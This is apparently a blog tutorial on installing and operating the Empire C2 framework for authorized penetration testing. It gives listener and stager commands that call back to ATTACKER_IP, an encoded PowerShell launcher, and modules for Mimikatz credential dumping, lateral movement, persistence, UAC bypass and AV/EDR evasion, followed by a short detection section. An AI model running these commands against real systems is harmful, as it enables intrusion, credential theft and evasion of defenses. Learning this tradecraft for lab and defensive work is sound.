Ethical Hacking #empire#C2#post-exploitation

Empire C2 Framework: Setup and Usage Guide for Pentesters

Learn how to set up and use the Empire post-exploitation C2 framework for authorized penetration testing labs.

9 min read

Empire is a post-exploitation command-and-control (C2) framework built for penetration testers and red teamers. Originally developed as PowerShell Empire, the modern version supports Python and cross-platform agents. Empire enables testers to establish persistent access, move laterally, escalate privileges, and exfiltrate data — all through an encrypted communication channel — making it an essential tool for understanding advanced persistent threat (APT) techniques.

Important: Empire is a powerful offensive tool. Use it exclusively in authorized lab environments, CTFs, or penetration tests with explicit written permission.

Installation

Empire requires Docker or a direct Python install. Docker is the cleanest approach:

# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire

# Install with setup script
sudo ./setup/install.sh

# Start the server
sudo poetry run python empire/server/server.py

Or with Docker:

docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest

The Empire server runs on port 1337 by default. Access the web UI at http://localhost:5000 after starting.

Empire Architecture

Empire uses a client-server model:

ComponentDescription
ServerBackend managing listeners, agents, and modules
Client (Starkiller)Web UI for managing operations
ListenerWaits for agent callbacks
StagerGenerates the payload to deliver to the target
AgentRuns on the compromised machine and reports back
ModulePost-exploitation tasks run on agents

Setting Up a Listener

In Starkiller (web UI) or the CLI, create an HTTP listener:

# CLI approach
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://ATTACKER_IP:80
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute

For HTTPS (recommended for evasion), configure a certificate:

(Empire: listeners/https) > set CertPath /path/to/cert.pem

Generating a Stager

With a listener running, generate a stager payload:

(Empire) > stagers
(Empire: stagers) > usestager multi/launcher
(Empire: stagers/multi/launcher) > set Listener http
(Empire: stagers/multi/launcher) > generate

This generates a PowerShell one-liner you can execute on the target:

powershell -noP -sta -w 1 -enc BASE64ENCODEDPAYLOAD

Other useful stagers:

  • windows/launcher_bat — BAT file
  • windows/macro — Office macro
  • multi/bash — Bash script for Linux targets
  • osx/safari_launcher — macOS Safari exploit

Working with Agents

Once a target executes the stager, an agent checks in:

(Empire) > agents
# List all active agents

(Empire: agents) > interact AGENT_NAME
(Empire: AGENT_NAME) > shell whoami
(Empire: AGENT_NAME) > shell hostname

Agent commands execute in memory without touching disk, making detection harder for endpoint security tools.

Post-Exploitation Modules

Empire includes hundreds of modules organized by function:

Situational Awareness

(Empire: AGENT_NAME) > usemodule situational_awareness/network/portscan
(Empire: AGENT_NAME) > usemodule situational_awareness/host/computerdetails

Credential Harvesting

# Dump credentials from memory (Mimikatz-style)
(Empire: AGENT_NAME) > usemodule credentials/mimikatz/logonpasswords
# SAM database extraction
(Empire: AGENT_NAME) > usemodule credentials/mimikatz/sam

Lateral Movement

# PsExec-style lateral movement
(Empire: AGENT_NAME) > usemodule lateral_movement/invoke_psexec
set ComputerName TARGET_HOSTNAME
set Listener http
execute

# WMI-based execution
(Empire: AGENT_NAME) > usemodule lateral_movement/invoke_wmi

Persistence

# Registry-based persistence
(Empire: AGENT_NAME) > usemodule persistence/elevated/registry
# Scheduled task
(Empire: AGENT_NAME) > usemodule persistence/elevated/schtasks

Privilege Escalation

# PowerUp — checks for common Windows privesc vectors
(Empire: AGENT_NAME) > usemodule privesc/powerup/allchecks
# Bypass UAC
(Empire: AGENT_NAME) > usemodule privesc/bypassuac_fodhelper

Bypassing Defenses (Lab Context Only)

Empire includes built-in obfuscation options for testing AV/EDR detection capabilities:

# Apply obfuscation to stager
(Empire: stagers/multi/launcher) > set Obfuscate True
(Empire: stagers/multi/launcher) > set ObfuscateCommand Token\All

This tests how well your organization’s detection stack catches common obfuscation patterns.

Detection and Defense

Understanding how Empire is detected helps defenders:

  • Network: Unusual outbound HTTP/HTTPS with periodic callbacks (beaconing). The default sleep is 5 seconds — detectable via NetFlow analysis
  • Host: PowerShell execution with -NoProfile -NonInteractive -WindowStyle Hidden flags; AMSI bypass attempts
  • Event Logs: Event ID 4104 (PowerShell Script Block Logging) captures Empire commands if properly configured

Enable PowerShell logging for detection:

Computer Configuration > Administrative Templates > Windows Components > PowerShell > Turn on Script Block Logging

Lab Resources

Practice Empire in isolated environments:

  • GOAD (Game of Active Directory) — Multi-machine vulnerable AD environment
  • VulnAD — Simple vulnerable AD for practice
  • TryHackMe: Empire Red room

Empire is an advanced tool that mirrors real-world APT tradecraft. Using it in controlled labs builds deep familiarity with post-exploitation techniques that directly maps to certifications like CRTO, CRTP, and OSCP Advanced.

#PowerShell #pentesting #post-exploitation #C2 #empire

// related articles

ethical-hacking Linux Privilege Escalation Techniques and Tools 7 min read ethical-hacking Evil-WinRM: Windows Remote Management for Pentesters 7 min read ethical-hacking FFUF Web Fuzzing Complete Guide for Pentesters 7 min read